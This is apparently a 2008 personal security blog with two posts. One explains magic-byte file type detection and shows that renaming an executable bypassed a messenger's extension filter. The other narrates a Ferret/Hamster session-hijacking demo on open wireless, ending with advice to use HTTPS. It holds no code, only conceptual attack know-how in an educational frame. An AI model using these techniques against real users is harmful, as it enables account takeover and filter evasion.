Monday, July 21, 2008

Magic bytes

File type detection is crucial when attempting to block specific file types from being downloaded in a corporate environment for security or legal reasons. File extension renaming is a rudimentary method of bypassing security filters but yet it is surprisingly still effective in certain scenarios. Ever tried sending an executable file over the MSN network? The Windows Live Messenger client will display an error message "The file you attempted to send has been detected as potentially unsafe and was not sent.". Have you tried renaming .exe to .doc? OMG... it works!!!
Perfect example why filtering by file extension name is weak. The more sophisticated and effective method of file type detection is "magic bytes" matching. Certain files can be uniquely identified by either their file header or file header and file footer combination. An executable file will have the hex values of "4D 5A" or its ASCII equivalent of "MZ" at the beginning of the file.

PDF files on the other hand can be identified by their file header and footers.

Don't believe me? Give it a go. Download HxD Hex Editor to view files in Hex format. Try renaming file extensions and you will see that the file contents do not change.

Tuesday, July 15, 2008

Session hijacking

Imperva defines session hijacking as "the act of taking control of a user session after successfully obtaining or generating an authentication session ID... involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress".
I demonstrate session hijacking using a combination of tools called Ferret and Hamster as well as my own private wireless network. No neighbours or wireless users were harmed during this recording. The use of Internet Explorer is to simulate another party (ie. the "victim") sharing the same open wireless network (eg. free wireless at Starbucks). Ferret sniffs the unencrypted traffic in the air and collects useful information into a text file. From Firefox, I access Gmail to show the login page and verify that I did not cheat by logging in earlier. Hamster is then utilised to present web session-related information in the form of hyperlinks which I click to present me (ie. the "attacker") with easy access to active sessions. Viola! You have been hijacked!

The higher res version of this demo can be downloaded here.

To avoid being hijacked, avoid logging into websites that do not support HTTPS on open wireless networks. If you don't want to be snooped on, don't use public networks period.